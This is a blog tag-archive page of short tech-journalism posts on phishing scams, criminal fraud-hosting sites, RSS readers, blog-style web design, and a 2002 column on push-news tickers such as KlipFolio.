Tag Archives: Website

Phishing Toolbars — The One That Works

Last week I wrote in my WSJ.com/AWSJ column (sub required) about the cross site scripting phish I received a few weeks ago (it appeared late because of the Easter holiday.) The point I made in the column is that most of the browser toolbars designed to prevent phishing failed to warn the user of the attack.

Some readers have asked which toolbars didn’t work. I didn’t have space in the column to list them, but I did mention that one worked: Netcraft’s Anti-phishing Toolbar. Sadly it only works with IE, but since most banking sites still insist on only functioning in that browser, this is not too much of a handicap. Netcraft are actually an interesting, serious bunch of people who do good work, not least their DNS search engine. (They also measure server traffic, and pointed a few days back to a burst in visits to the Vatican’s website as the Pope lay on his deathbed.)

Anyway, next posting I plan to list the toolbars that didn’t work on the Charterone phish.

Phishing Your Yahoo! Account

More evidence that phishers are widening their net. Munir Kotadia of ZDNet Australia reports that Yahoo’s free instant-messaging (IM) service is being targeted by phishers in an attempt to steal usernames, passwords and other personal information.

Yahoo confirmed on Thursday its service was being targeted by a phishing scam. According to the search giant, attackers are sending members a message containing a link to a fake Web site that looks like an official Yahoo site and asks the user to log in by entering their Yahoo ID and password.

The scam is convincing because the original message seems to arrive from someone on the victim’s friends list. Should the recipient of the phishing message enter their details, the attackers can gain access to any personal information stored in their profile and more importantly, the victim’s contact lists.

The bigger point about this is that any kind of password may be enough for the phisher. WIth Yahoo! the successful phisher may be able to get quite a lot of personal data for a future social engineering attack, and may even be able to access payment details such as addresses from within the profile. A phisher could also access the user’s Paypal account, redirect shipments, learn about the user’s investments, impersonate the user in auctions, etc etc. I’m not sure whether the phisher could access credit card details, but it’s feasible, I guess.

Bloglines Goes International

The folks at Bloglines, a very popular web-based RSS reader and publisher, will today launch an international version with support for six languages, which they hope “may mark a shift in the expansion of blog/RSS reach and usage, heading down the global internet service road paved by eBay and Amazon, etc.”

The new internationalized web site, due to go live later today, offers the service in Chinese, French, German, Japanese, Portuguese and Spanish. Bloglines reckons it “is the first RSS service to embrace consumers in multiple languages”. The internationalization includes the home page, navigation screens, and all the help menus and user tips.

How To Phish Google

I’ve long believed that phishing emails are just the beginning of a new kind of fraud which is likely to be sophisticated and fast moving. Here’s an example of what they might look like, courtesty of a British computer scientist called Jim Ley, written up at the security website Netcraft. Ley, Netcraft says, “has demonstrated that opportunities exist for fraudsters to launch phishing attacks using cross site scripting bugs on the very widely used Google sites.”

I’m not quite clear from either account whether this is one vulnerability or more, and whether it applies only since Google extended their desktop search to include files on your computer (rather than on the Internet).

As far as I can figure it out, it works like this. A bad guy, rather than try to lure a victim to his dodgy website using a socially engineered email or a virus, would ‘inject’ content into Google to do the same thing. So, say, a user would visit Google to find a credit card submission form which explains that Google is soon to become a subscription-only service at $5 per month, but that users could take advantage of an earlybird special offer to obtain lifetime free searches for just $10. (This is Ley’s example, cited by Netcraft.)

Another vulnerability included in the Google Desktop would, Netcraft says, have “allowed an attacker to search a user’s local machine for passwords and report the results directly back to the attacker’s own web site.” Both vulnerabilities have been fixed, but Netcraft and Ley say incompletely.

I don’t claim to understand the technical aspects of this, and it may be somewhat obscure. But what is worrying is that (a) Ley reports Google as being less than interested in addressing the issues he raised (two years ago, according to his website) and, (b) that if such tricks are occurring to diligent folk like Ley, they must be occurring to hackers and the Internet underground. I’ve said it before, and I’ll say it again: Phishing is not just misleading emails, it’s a multifaceted effort to part us ordinary folk from our online money. And it’s not going to go away. Indeed, like most things technological, it’s a fast escalating arms race, and I don’t think we’ve even started to get it figured out.

Are Blogs The Future Of Web Design?

Have blogs changed our idea of what constitutes a well-designed webpage?

I was reading Wired’s interesting piece on guerrilla webpage redesign, where disgruntled folk take the content of a badly designed website and make their own mirror, throwing out the Javascript, cookies, confusing menus, bugs, excessive art-junk for a slimmed down, simplified imitation on their own server.

While the piece talks about the trouble these folk go to, and the trouble they land up in, I couldn’t help noticing that David Jone’s excellent makeover of Wales’ National Assembly website is basically a blog. Everything is there from the original, but it’s all a lot easier to navigate and much easier on the eye. But it looks, feels, and walks, like a blog.

Are blogs turning the huge ship that is the World Wide Web back to its roots, where webpages were less about glitz and more about content, where simplicity and usability counted for more than multimedia interactivity and gee-whiz mouseovers? Or not? Or did it all happen a long time ago and I only just notice?

Fraud For Sale

Online fraud and other forms of Internet crime is a business, openly sold over the Internet.
 
British-based Internet security company Netcraft says they’re receiving spam advertising dozens of “fraud hosting” websites that offer services and gather together those interested in such pursuits. Unsurprisingly, perhaps, most are Russian. But not all.
 
Carderportal.com resolves to Netfirms, a hosting service based in Toronto. Netcraft says carder.org “was also hosted in North America” but has since had its record removed.

What’s interesting, apparently, is how brazenly mainstream companies are hosting these sites. Nethouse in St. Petersburg “houses stalk.ru, majordomo.ru and mazafaka.ru. Nethouse, which brands its hosting unit as Majordomo.ru, is housed within the data center of Runnet, the third-largest Russian hosting provider with 11.5K hostnames,” Netcraft says.

Not all are active. One, MaZaFaKa.Ru (unless I’m much mistaken, saying it out loud gives a good idea of the reason behind the name; the website’s motto is ‘Network Terrorism’ and its copyright text is, er, nonstandard), offers everything from cracks (usually code that has broken past the anti-piracy controls on software) to scripts, viruses and other nasties. It also lists the ‘last hacked sites’ — presumably websites that its members have managed to break into — many of which are Russian. (The message left on the hacked sites is anti-US involvement in Iraq.) It even contains the original Netcraft posting on its site. Unfortunately I’m not a Russian speaker so I can’t explore more.

Agava Software Network in Moscow, Netcraft says, hosted the “Russian Carder Clan” site at carderclan.net (195.161.118.168), which ran on a shared server at Agava.net. The site has recently been taken offline, as has Carderportal.org (81.176.64.102) at epolis.ru, which also resided at Agava. Agava ”specializes in the offshore custom software development and provides the off-site consulting, development, and testing services”, and lists among its projects WebCelerator, software to speed up surfing.

Here’s a list of the domains advertised, according to Netcraft: carder.org, carderclan.net, carderportal.com, carderportal.org, the cc.ru, mazafaka.ru, lncrew.com, majordomo.ru and agava.com. Register at one of them and you can expect to be offered “Spam Hosting – from 20$ per mounth, Fraud Hosting – from 30$ per mounth, Stolen Credit Cards, Fake ID, DL’s, Spam For free (with a limited time period)”.

Here’s another one that Netcraft didn’t mention: Asechka.ru, which has recently sent spam advertising its ‘fraud and carders site’: “On our site and board you are find: Bulk, Spam and Fraud Hosting, Stolen Credit Cards for Sale, Stolen Dumps of cardholder’s for Sale, Children Porno, Sex, Erotic films…. WE ACCEPT: Western Union, WebMoney, E-GOLD.”

I’m seeking comment from some of these sites.

News: Another way to get your fix

Another way of getting news
 
 
 I’ve talked ad nauseam about RSS feeds — a method of getting you snippets of news and whatnot but not clogging your inbox, or exposing you to more spam — but if you find it all a bit fiddly, you might want to try this option. ToolButton Inc. this week released version 1.2 of ToolButton, an Internet Explorer browser enhancement “that provides users with a delivery channel to obtain content from their favorite websites without the worry and bother of spam.”
 
Basically, the ToolButton is a toolbar that appears in your browser, offering buttons to dynamic — i.e. it changes when new news comes in — and static content — it doesn’t (change, that is) from websites you choose. A website?s ToolButton can include news content, dynamic feeds, blogs, RSS content and menus of important URLs.
 
I’ve installed it and like it. What I haven’t checked out is whether it’s monitoring your browsing activities. More on that once I find out, and hear back from the ToolButton folk.

Column: Klips

Loose Wire: When Push Comes to Shove

By Jeremy Wagstaff
from the 25 April 2002 edition of the Far Eastern Economic Review, (c) 2003, Dow Jones & Company, Inc.

I think I can safely say it, though others have been saying it for years: Push is dead. In which case I’d like to be the first to say: Long live push.

For those of you who weren’t following closely, push was much hyped in the mid-1990s when computers were first being hooked up to the Internet in a big way. The idea was simple enough: instead of users going to Web sites to get information — pull — the information could be sent — pushed — to the user. You could then sit back and watch it all — cricket scores, share prices, headlines — scroll across your screen. For the corporate world it was an opportunity to also push ads, special offers and branding.

So what went wrong? First out of the starting gate, PointCast earned lasting opprobrium because its software hogged computer and Internet resources. PointCast retired hurt, and was eventually bought by EntryPoint in 1999, which a year later merged with Internet Financial Network Inc. to form InfoGate. This stopped offering its free ticker in mid-April, and now can only be found in the technology behind the subscription-based USA Today NewsTracker ($40 a year from newstracker.usatoday.com), which somewhat fittingly looks like the PointCast of old.

Actually, it’s not push that is dead. It’s the gravity-defying business models and catch-all products that don’t offer anything other people can’t offer for free. InfoGate fell by the wayside because it didn’t make any money. USA Today’s NewsTracker won’t, in my view, attract users because you can get the same thing free elsewhere — try the BBC’s excellent Newsline ticker (www.bbc.co.uk/newsline).

Why then has yet another scrolling-ticker business thrown open its doors to the public in the same week as InfoGate closed them? Enter KlipFolio from Serence, a small Windows program that at first blush is not much different. The scrolling is familiar; the clicking on a headline to see the full story is the same. The only visible change is that each Klip contains information from one source only, so instead of one big scrolling ticker with everything in it, from CNN to your local rag, Klips are small and independent.

Below stairs, it’s very different: a content-service provider (what you and I would call a Web site, whether it’s a magazine, news service, an auction site or whatever) adds some lines of Klip computer code so that every time they add some data to their Web site (a news story, an updated stock price, a new item for sale) that data is added to the Klip’s scrolling headlines.

Users, meanwhile, select which Klips they want to view on their screen, which will then update in real time with the new story, price or item for sale. Simple. Serence operates merely as the provider of technology to the content-service providers. For the user, the Klip software is free (www.Klipfolio.com), though Serence says some providers may charge for content in the future.

So what’s so different about this? Well, first off the software looks and works beautifully. Secondly, the back end is simple enough for content-service providers to be able to incorporate it without any extra computers, technicians or PhDs. This means that Serence is just an intermediary; it just provides a site where users can find what sources are available, and it licenses the software to the providers.

Where I believe Klips might really take off, however, is in delivering more specialized content. Sure, we can monitor Web sites, get stuff by e-mail, even have stock prices sent to our mobile phone, but imagine having a Klip that monitors, say, the prices of fast-moving items on an on-line auction site, or jobs in a particular industry.

What’s more, Serence has priced the product so that even individuals who produce specialist newsletters can jump aboard for about $100 a month. Indeed, as Blogs — Web sites that collate niche news and analysis — become more organized, Klips may emerge as a great way for individuals to provide a valuable real-time service which grateful users may pay for.

If that happens, it may well mark the coming of age of push: an information-delivery service that gives me stuff I need, doesn’t take up space and doesn’t go out of business.